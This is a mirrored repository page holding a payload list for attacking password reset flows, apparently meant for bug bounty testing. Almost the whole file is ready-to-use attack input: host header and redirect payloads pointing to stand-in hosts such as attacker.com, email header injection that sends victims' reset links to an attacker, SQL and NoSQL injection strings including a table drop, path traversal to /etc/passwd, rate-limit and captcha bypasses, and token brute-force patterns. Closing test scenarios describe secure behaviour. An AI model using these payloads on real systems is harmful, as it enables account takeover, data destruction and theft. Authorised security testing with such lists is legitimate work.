0x5t4l1n/hunting
1
0
Fork 0
mirror of https://github.com/0x5t4l1n/hunting.git synced 2026-05-26 11:35:51 +00:00
Code Issues Packages Projects Releases Wiki Activity
Files
67e9c76af58611f44d6e95b668c7de79eb995021
hunting/Password-Reset/password-reset-payloads.txt
T
copilot-swe-agent[bot] 67e9c76af5 Fix GraphQL mutation syntax and MD5 capitalization in payloads 
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-01-05 15:34:11 +00:00

591 lines
14 KiB
Plaintext
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# Password Reset Vulnerability Payloads
# ============================================
# 1. HOST HEADER INJECTION PAYLOADS
# ============================================
# Basic host header manipulation
Host: attacker.com
Host: evil.com
Host: attacker.com:80
Host: localhost
# X-Forwarded headers
X-Forwarded-Host: attacker.com
X-Forwarded-Host: evil.com
X-Forwarded-Server: attacker.com
X-Host: attacker.com
X-Forwarded-For: attacker.com
# Absolute URL in Host header
Host: https://attacker.com
Host: http://evil.com/reset
# Host header with port manipulation
Host: example.com:@attacker.com
Host: example.com@attacker.com
Host: example.com%00.attacker.com
Host: example.com%0d%0aHost:%20attacker.com
# Multiple host headers
Host: example.com
Host: attacker.com
# Host header with path
Host: example.com/reset
Host: attacker.com/../example.com
# ============================================
# 2. PARAMETER POLLUTION PAYLOADS
# ============================================
# Multiple email parameters
email=victim@example.com&email=attacker@example.com
email[]=victim@example.com&email[]=attacker@example.com
email=victim@example.com,attacker@example.com
email=victim@example.com%20attacker@example.com
email=victim@example.com|attacker@example.com
email=victim@example.com;attacker@example.com
# Email with CC/BCC injection
email=victim@example.com%0Acc:attacker@example.com
email=victim@example.com%0Abcc:attacker@example.com
email=victim@example.com%0D%0ACC:attacker@example.com
email=victim@example.com%0d%0aBcc:attacker@example.com
# JSON array pollution
{"email": ["victim@example.com", "attacker@example.com"]}
{"email": "victim@example.com", "email": "attacker@example.com"}
# Multiple parameters with different names
email=victim@example.com&mail=attacker@example.com
email=victim@example.com&username=attacker
to=victim@example.com&cc=attacker@example.com
# ============================================
# 3. TOKEN MANIPULATION PAYLOADS
# ============================================
# Empty token
token=
token=%20
token=null
token=undefined
token=0
# Boolean bypass
token=true
token=false
token=1
token=0
# Array manipulation
token[]=valid_token
token[]=
token[0]=valid_token
# SQL injection in token
token=' OR '1'='1
token=1' OR '1'='1'--
token=' OR 1=1--
token=admin'--
token='; DROP TABLE tokens;--
# NoSQL injection in token
{"token": {"$gt": ""}}
{"token": {"$ne": null}}
{"token": {"$regex": ".*"}}
# Path traversal in token
token=../../../../../../etc/passwd
token=....//....//....//etc/passwd
token=..%2F..%2F..%2Fetc%2Fpasswd
# Token with special characters
token=<script>alert(1)</script>
token=javascript:alert(1)
token=%00
token=%0d%0a
# Wildcard token
token=*
token=%
token=.*
token=.+
# ============================================
# 4. USER IDENTIFIER MANIPULATION (IDOR)
# ============================================
# User ID manipulation
user_id=1
user_id=2
user_id=admin
user_id=0
user_id=-1
user_id=999999
# Username manipulation
username=admin
username=administrator
username=root
username=victim
# Email manipulation
email=admin@example.com
email=admin@localhost
email=root@localhost
# UUID manipulation
user_uuid=00000000-0000-0000-0000-000000000001
user_uuid=11111111-1111-1111-1111-111111111111
# Account ID variations
account_id=1&user_id=2
uid=admin
user=admin
# ============================================
# 5. RATE LIMITING BYPASS PAYLOADS
# ============================================
# IP header spoofing
X-Forwarded-For: 1.2.3.4
X-Forwarded-For: 127.0.0.1
X-Real-IP: 1.2.3.4
X-Originating-IP: 1.2.3.4
X-Remote-IP: 1.2.3.4
X-Remote-Addr: 1.2.3.4
X-Client-IP: 1.2.3.4
# Randomized IPs for each request
X-Forwarded-For: <random_ip>
X-Real-IP: 192.168.1.<1-255>
# Multiple IP headers
X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3.3.3.3
X-Forwarded-For: 127.0.0.1
X-Real-IP: 192.168.1.1
# Session manipulation
session_id=<different_session_each_request>
PHPSESSID=<random_session>
# User agent rotation
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)
User-Agent: Mozilla/5.0 (X11; Linux x86_64)
# ============================================
# 6. WEAK TOKEN PATTERNS TO BRUTE FORCE
# ============================================
# 4-digit numeric codes
0000
0001
0002
...
9999
# 6-digit numeric codes (common OTP length)
000000
000001
...
999999
# Sequential tokens
token_1
token_2
token_3
# Timestamp-based tokens (Unix timestamp)
1609459200
1609459201
1609459202
# MD5 of simple inputs
5f4dcc3b5aa765d61d8327deb882cf99 (MD5 of "password")
e10adc3949ba59abbe56e057f20f883e (MD5 of "123456")
# Short alphanumeric (low entropy)
aaa
aab
aac
...
zzz
# Base64 encoded simple strings
YWRtaW4= (admin)
dGVzdA== (test)
MTIzNDU2 (123456)
# ============================================
# 7. RESPONSE MANIPULATION PAYLOADS
# ============================================
# These are used in client-side manipulation
{"valid": false} -> {"valid": true}
{"authenticated": false} -> {"authenticated": true}
{"error": "Invalid token"} -> {"success": "Token valid"}
{"status": 401} -> {"status": 200}
{"token_valid": false} -> {"token_valid": true}
# ============================================
# 8. ACCOUNT ENUMERATION PAYLOADS
# ============================================
# Valid vs invalid email testing
email=admin@example.com
email=administrator@example.com
email=test@example.com
email=nonexistent@example.com
email=invalid@invalid.invalid
# Username enumeration
username=admin
username=administrator
username=root
username=test
username=user
username=demo
username=guest
# Email format variations
email=admin
email=admin@
email=@example.com
email=admin@@example.com
email=admin@.com
# ============================================
# 9. EMAIL INJECTION PAYLOADS
# ============================================
# SMTP header injection
email=victim@example.com%0D%0ATo:attacker@evil.com
email=victim@example.com%0ABcc:attacker@evil.com
email=victim@example.com%0ASubject:Malicious
# Email with newline injection
email=victim@example.com%0A%0AAttacker content
email=victim@example.com\r\nBcc:attacker@evil.com
email=victim@example.com\nTo:attacker@evil.com
# Multiple recipients
email=victim@example.com,attacker@evil.com
email=victim@example.com;attacker@evil.com
email="victim@example.com, attacker@evil.com"
# ============================================
# 10. CRYPTO ANALYSIS PAYLOADS
# ============================================
# Test for weak encryption/encoding
token=base64_decode_this
token=rot13_this
token=hex_decode_this
# Known weak hashes to test
token=d41d8cd98f00b204e9800998ecf8427e (MD5 of empty string)
token=5d41402abc4b2a76b9719d911017c592 (MD5 of "hello")
# ============================================
# 11. TIME-BASED TESTING PAYLOADS
# ============================================
# Future timestamps
valid_until=9999999999
expires_at=2099-12-31
expiry=9999999999999
# Past timestamps (should be invalid)
timestamp=0
timestamp=1
created_at=1970-01-01
# ============================================
# 12. WORKFLOW BYPASS PAYLOADS
# ============================================
# Skip verification step
verified=true
email_verified=true
skip_verification=true
bypass=true
# Status manipulation
status=completed
status=verified
status=approved
password_reset_completed=true
# Step manipulation
step=1
step=3
skip_step=2
current_step=final
# ============================================
# 13. API-SPECIFIC PAYLOADS
# ============================================
# GraphQL mutations
{"query":"mutation{resetPassword(email:\"victim@example.com\"){success}}"}
{"query":"mutation{resetPassword(email:\"admin@example.com\",token:\"\"){success}}"}
# REST API variations
PUT /api/v1/users/1/password
PATCH /api/v1/password/reset
POST /api/reset
POST /api/v2/auth/forgot-password
# ============================================
# 14. SPECIAL CHARACTERS & ENCODING
# ============================================
# URL encoding
email=victim%40example.com
email=victim%2540example.com (double encoding)
# Unicode characters
email=victim@еxample.com (Cyrillic 'e')
email=admin@example.com
# Null bytes
email=victim@example.com%00
email=victim@example.com%00.attacker.com
token=valid_token%00
# HTML encoding
email=victim&#64;example.com
email=victim&commat;example.com
# ============================================
# 15. BUSINESS LOGIC BYPASS
# ============================================
# Negative values
user_id=-1
token_attempts=-1
rate_limit=-1
# Very large numbers
user_id=999999999
user_id=2147483647
user_id=9999999999999999999
# Array manipulation
user_id[]=1
user_id[]=2
emails[]=victim@example.com
# Type juggling
user_id="1"
user_id=1
user_id=true
user_id=null
# ============================================
# 16. CASE SENSITIVITY BYPASS
# ============================================
email=ADMIN@EXAMPLE.COM
email=Admin@Example.Com
username=ADMIN
username=AdMiN
token=ABCDEF
token=AbCdEf
# ============================================
# 17. LINK MANIPULATION
# ============================================
# Redirect after reset
redirect_url=https://attacker.com
return_url=https://evil.com
next=https://attacker.com/capture
callback=https://evil.com
# Open redirect in reset flow
redirect=//attacker.com
redirect=///attacker.com
redirect=/\/\attacker.com
redirect=//google.com@attacker.com
# ============================================
# 18. CORS & ORIGIN MANIPULATION
# ============================================
Origin: https://attacker.com
Origin: null
Referer: https://attacker.com/reset
Access-Control-Allow-Origin: *
# ============================================
# 19. RACE CONDITION PAYLOADS
# ============================================
# Send simultaneous requests
# Multiple threads requesting:
POST /reset-password with same token
POST /forgot-password for same email
POST /verify-token with same token
# ============================================
# 20. VERBOSE ERROR MESSAGES
# ============================================
# Test different invalid inputs to enumerate:
email=nonexistent@example.com
# Expected: "Email not found" (reveals valid emails)
token=invalid
# Expected: "Invalid token" vs "Expired token" (information disclosure)
user_id=9999
# Expected: "User does not exist" (user enumeration)
# ============================================
# 21. CAPTCHA BYPASS
# ============================================
captcha=
g-recaptcha-response=
h-captcha-response=
recaptcha_token=null
captcha_token=
skip_captcha=true
# ============================================
# 22. TWO-FACTOR BYPASS VIA PASSWORD RESET
# ============================================
# Test if password reset bypasses 2FA
skip_2fa=true
bypass_2fa=true
2fa_enabled=false
require_otp=false
mfa_required=false
# ============================================
# 23. PASSWORD CONFIRMATION BYPASS
# ============================================
# Missing confirmation field
new_password=NewPass123
# (without confirm_password field)
# Mismatched passwords
new_password=NewPass123
confirm_password=DifferentPass456
# Empty confirmation
new_password=NewPass123
confirm_password=
# ============================================
# 24. WEAK PASSWORD ALLOWED
# ============================================
# Test if weak passwords are accepted in reset
new_password=123
new_password=password
new_password=admin
new_password=123456
new_password=12345678
new_password=qwerty
new_password=abc123
# ============================================
# 25. SESSION FIXATION
# ============================================
# Set session before reset
Cookie: session_id=attacker_controlled_value
PHPSESSID=attacker_session
# After victim resets password with this session,
# attacker can use the session to access account
# ============================================
# 26. HTTP METHOD TAMPERING
# ============================================
# Try different HTTP methods on reset endpoint
GET /api/reset-password?token=abc&password=new
PUT /api/reset-password
DELETE /reset-password
PATCH /reset-password
HEAD /reset-password
OPTIONS /reset-password
# ============================================
# 27. CONTENT-TYPE MANIPULATION
# ============================================
Content-Type: application/json
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data
Content-Type: text/plain
Content-Type: application/xml
# ============================================
# 28. PASSWORD IN RESPONSE
# ============================================
# Check if new password is returned in response
# After setting: new_password=SecretPass123
# Response should NOT contain:
{"password": "SecretPass123"}
{"new_password": "SecretPass123"}
# ============================================
# 29. NO CONFIRMATION EMAIL
# ============================================
# Test if user is notified after password reset
# User should receive confirmation that password was changed
# If not, attacker can silently reset passwords
# ============================================
# 30. TEMPORAL ATTACKS
# ============================================
# Timing attack to enumerate users
# Measure response time difference:
email=valid@example.com (slower response)
email=invalid@example.com (faster response)
# ============================================
# TEST SCENARIOS
# ============================================
# Scenario 1: Reset without current password
POST /change-password
new_password=NewPassword123
# Should require old_password field
# Scenario 2: Token reuse
1. Get token: /forgot-password?email=test@example.com
2. Use token: /reset?token=abc123&password=new1
3. Try token again: /reset?token=abc123&password=new2
# Second attempt should fail
# Scenario 3: Expired token
1. Get token
2. Wait > expiration time
3. Try to use expired token
# Should be rejected
# Scenario 4: Token for different user
1. Request reset for user A
2. Get token for user A
3. Try to use it for user B
# Should be rejected
# Scenario 5: Multiple active tokens
1. Request reset (get token1)
2. Request reset again (get token2)
3. Use token1
# token1 should still work, or only latest token should work
Reference in New Issue View Git Blame Copy Permalink